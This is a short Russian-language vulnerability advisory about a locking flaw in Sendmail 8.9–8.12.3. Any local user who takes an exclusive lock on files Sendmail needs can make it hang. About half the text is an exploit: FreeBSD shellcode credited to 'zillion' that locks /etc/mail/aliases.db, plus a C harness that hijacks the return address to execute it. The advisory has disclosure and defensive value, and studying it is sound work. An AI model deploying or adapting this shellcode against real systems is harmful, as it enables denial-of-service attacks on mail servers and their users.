Sendmail - почтовый агент для Unix и Linux вариантов.
Программа зависает, когда злонамеренный пользователь приобретает исключительную блокировку на файлах (используя flock() или fcntl()), которые Sendmail требует для
работы. Другие программы, использующие исключительную блокировку, также уязвимы к этой проблеме.
Уязвимость обнаружена в Sendmail Consortium Sendmail 8.9-8.12.3
Эксплоит:
/*
FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)
More info: http://www.sendmail.org/LockingAdvisory.txt
*/
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
"\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
"\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
"\x69\x61\x73\x65\x73\x2e\x64\x62";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
